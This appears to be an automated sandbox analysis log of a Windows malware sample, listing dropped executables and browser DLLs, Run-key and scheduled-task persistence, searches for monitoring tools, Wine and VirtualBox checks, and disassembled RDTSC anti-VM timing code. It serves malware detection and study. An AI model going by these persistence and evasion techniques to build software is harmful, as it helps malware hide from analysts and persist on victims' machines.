Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\1000003002\ee7a49fbf0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-72662

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 7BF1E2 second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F5828CEC315h 0x00000010 jmp 00007F5828CEC30Fh 0x00000015 nop 0x00000016 jmp 00007F5828CEC317h 0x0000001b push dword ptr [ebp+122D1685h] 0x00000021 jno 00007F5828CEC30Ch 0x00000027 call dword ptr [ebp+122D389Ah] 0x0000002d pushad 0x0000002e jns 00007F5828CEC31Dh 0x00000034 xor eax, eax 0x00000036 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D1EFAh], edi 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D29CCh], eax 0x0000004e js 00007F5828CEC312h 0x00000054 js 00007F5828CEC30Ch 0x0000005a sub dword ptr [ebp+122D1D98h], esi 0x00000060 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000066 mov esi, 0000003Ch 0x0000006b cld 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D1A4Ch], esi 0x00000076 lodsw 0x00000078 jmp 00007F5828CEC318h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 clc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 stc 0x00000087 push eax 0x00000088 push esi 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 7BEA92 second address: 7BEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9326FE second address: 93270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5828CEC306h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 93270E second address: 932718 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5828704A66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 932859 second address: 932862 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 932862 second address: 932868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 932868 second address: 93286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 932C31 second address: 932C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F5828704A66h 0x0000000b jl 00007F5828704A66h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jmp 00007F5828704A6Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5828704A76h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 932C69 second address: 932C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 932C6D second address: 932C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
